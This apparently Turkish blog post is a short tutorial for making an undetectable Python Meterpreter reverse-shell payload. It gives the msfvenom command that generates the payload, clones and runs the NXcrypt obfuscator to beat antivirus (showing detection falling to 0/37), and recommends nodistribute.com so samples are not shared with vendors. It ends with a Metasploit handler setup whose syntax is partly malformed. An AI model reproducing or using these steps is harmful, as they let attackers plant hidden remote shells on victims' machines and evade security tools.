Selamun Aleyküm ..
msfvenom -p python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port -o /root/Masaüstü/output.py
git clone https://github.com/Hadi999/NXcrypt.git
cd NXcrypt
python NXcrypt.py --help
python NXcrypt.py -f /root/Masaüstü/testingpython.py -o /root/Masaüstü/cryptpython.py
Before: Detected by 1/38
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd
After:
Detected by 0/37
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd
ENCRYPTİON FİNİSHED
Stop Using Virustotal !!!! Please, Use nodistribute.com
continuation :
msfconsole
use exploit/multi/handler/
use payload/python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port
options
ok
exploit -j
Yorum Gönder